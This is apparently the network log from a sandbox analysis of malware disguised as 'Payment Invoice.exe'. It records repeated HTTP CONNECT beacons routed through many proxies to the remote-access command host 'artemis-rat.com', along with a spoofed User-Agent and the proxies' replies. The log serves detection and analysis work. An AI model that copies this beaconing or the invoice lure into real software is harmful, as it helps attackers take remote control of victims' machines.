                                                                1489192.168.2.45453961.79.73.225807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.178394079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1490192.168.2.454789211.234.125.54437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.181113005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1491192.168.2.454659192.154.246.9690007076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.181113958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1492192.168.2.454790211.234.125.54437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.183533907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1493192.168.2.454794211.234.125.54437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.184895992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1494192.168.2.454412102.132.201.202807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.186974049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.640258074 CET343INHTTP/1.1 400 Bad Request
                                                                Server: nginx/1.14.0 (Ubuntu)
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 182
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1495192.168.2.454797211.234.125.54437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.187161922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1496192.168.2.45460467.43.236.2030117076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.194889069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.218719959 CET19INHTTP/1.0 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1497192.168.2.454534148.72.212.212589037076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.199007034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.026947021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.014241934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.027195930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.027044058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:33.011464119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1498192.168.2.453684180.183.212.21980807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.202953100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.327272892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.192796946 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1499192.168.2.454512103.216.49.23380807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.209749937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1500192.168.2.45453747.243.205.131287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.214132071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1501192.168.2.454497175.183.82.221807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.216504097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.089548111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1502192.168.2.454524170.84.205.1741537076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.222575903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1503192.168.2.45466318.117.144.24890807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.297766924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.521816015 CET116INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Server: nginx
                                                                Content-Type: text/plain
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1504192.168.2.449779103.199.155.1869697076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.298233032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1505192.168.2.45456547.243.114.19281807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.299283981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1506192.168.2.45379298.162.25.2341457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.299762964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1507192.168.2.454556125.122.26.24210807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.314135075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.027111053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1508192.168.2.454681185.162.231.254807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.314215899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.469448090 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1509192.168.2.454687104.21.64.208807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.315884113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.472269058 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1510192.168.2.45459314.47.70.13780807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.316629887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.980055094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.935370922 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1511192.168.2.454696104.16.108.234807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.316801071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.472822905 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1512192.168.2.45456294.131.14.6610807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.316888094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1513192.168.2.453937148.72.23.56423127076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.316981077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.327476978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.527096033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:33.620774031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:45.624588013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:09.714206934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1514192.168.2.454557177.67.136.24141537076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.317039013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1515192.168.2.454716104.19.120.84807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.317148924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.473110914 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1516192.168.2.453801139.162.238.184222437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.317255974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.386372089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.437247038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:33.511454105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1517192.168.2.45453089.218.8.15210807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.317737103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1518192.168.2.45261614.56.98.1531287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.323373079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.386389971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.437264919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
